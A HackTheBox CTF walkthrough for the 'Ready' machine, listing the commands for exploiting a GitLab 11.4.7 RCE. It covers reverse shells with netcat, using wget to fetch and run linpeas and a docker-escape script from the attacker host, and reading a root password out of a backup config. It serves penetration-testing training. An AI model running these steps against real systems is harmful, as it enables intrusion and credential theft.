CTF Challenges

Ready HackTheBox Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Ready,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. The challenge was designed by bertolis.

Level: Medium

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

  • Nmap

Enumeration

  • Browsing HTTP service  
  • Enumerating Gitlab pages

Exploitation

  • Exploiting Gitlab 11.4.7 RCE
  • Spawning TTY Shell  
  • Linpeas to search for possible paths to escalate privileges

Privilege Escalation

  • Escaping privilege docker container
  • Uploading bash script to gain root access

Capturing the flag

Walkthrough

Network Scanning

Let’s get started then!

To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.

IP Address assigned to Ready machine: 10.129.149.69

Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine

nmap -A 10.129.149.69

From the result above we found two working ports on the VM, ports that ran services such as SSH(22), NGINX(5080).

Since we don’t have the credentials for the SSH so we cannot enumerate it. The only service that is left is the NGINX service.

Enumeration

Starting with the nginx service, we try to enumerate by accessing the IP Address and port of the target machine on a Web Browser. We see a website that features gitlab service and redirects us to sign-in page.

Since there is a registration option so we immediately went to the register page to see if we can register.

Once registered, we noticed that it says “update asap” in red, usually, if we see a web application that is running an old version then there are high chances that the version will have several vulnerabilities.

Next, we searched for an exploit of GitLab version 11.4.7 on the searchsploit and we found a remote code execution (RCE) exploit is available. So, we quickly downloaded the available RCE exploit to our local machine and checked for required parameters.

searchsploit gitlab 11.4.7 
searchsploit -m 49334 
cat 49334.py

Exploitation

Since it is a python file, we executed it to take reverse shell by running it with required parameters.

python3 49334.py -g http://10.129.149.69 -u ignite -p 12345678 -l 10.10.14.108 -P 1234

Next, we started netcat listener on port 1234 in another terminal which successfully gave us a simple reverse shell of the user.

nc -lvp 1234
id

To access the proper terminal, we run following python one-liner command.

python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /tmp

So, to exploit further to get root shell, we uploaded linpeas from local machine to victim machine, the script will look for possible paths to escalate privileges.

wget 10.10.14.108:8000/linpeas.sh 
chmod 777 linpeas.sh 
./linpeas.sh

Privilege Escalation

The result below from linpeas tell us that we are in docker container, so we do some enumeration.

After enumeration we found gitlab.rb inside the directory /opt/backup and the file contains SMTP user login credentials. The credentials are useful for us if they are used by other users such as root. So, when we tried to login as root, and we successfully logged in.

But when we looked for root.txt it was not present in the root directory because we are in privilege docker container which can be escaped to get the root flag.

cd /opt 
ls 
cd /backup 
ls 
cat gitlab.rb | grep password 
su root 
Password : wW59U!ZKMbG9+*#h

Escaping docker container

So, to get the root flag and to escape docker container we created a bash on our local machine with the help of the article here.

Next, we started python one liner SimpleHttpServer in our local machine to transfer the file from our machine to victim machine.

On the victim machine, we move into the tmp directory and used wget to download the bash that was hosted on our local machine. We changed its permissions to make it executable and then ran it.

cd /tmp 
wget 10.10.14.108:8000/raj.sh 
chmod 777 raj.sh 
./raj.sh

Finally, we started the netcat listener on port 9000 in another terminal which gave us a reverse shell of the root user.

nc -lvp 9000 
cd /root 
ls 
cat root.txt

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.